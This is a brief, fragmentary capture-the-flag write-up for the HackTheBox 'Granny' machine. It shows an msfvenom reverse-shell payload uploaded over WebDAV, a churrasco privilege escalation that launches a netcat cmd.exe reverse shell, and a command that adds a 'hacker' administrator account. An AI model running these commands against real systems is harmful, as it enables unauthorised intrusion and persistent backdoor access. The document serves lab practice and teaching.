Granny HTB
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We use nmap for enumeration sudo nmap -p- -A -T4 -O
which gives
We find that a website is hosted:
We used dirbuster and found some hidden directories but they are empty
WE find that certain risky requests are permitted using davtest
Only text and html files are executable so we generate our payload to .aspx format and rename it to .txt using msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1234 -f aspx >reverse.aspx
and mv reverse.aspx reverse.txt
Then we use cadaver to start a dav session using cadaver
and use a put request to upload our reverse.txt file then rename it to reverse.aspx using move
we visit html:// with netcat listening where we get a shell
We used the churrasco exploit from and nc.exe file by uploading in the same manner and executing churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 4444 -e cmd.exe"
and listening on netcat using nc -nlvp 4444
can also run churrasco.exe -d "net user hacker hacker /add && net localgroup Administrators hacker /add"
We get a root shell:
We migrate to process 1964 for accessing the user
We use exploit_suggester and exploit and get a shell. As all this is pretty self explanatory we wont go into detail.
start metasploit and search for IIS exploits, find one and execute to get a meterpreter shell:
using ps to list processes: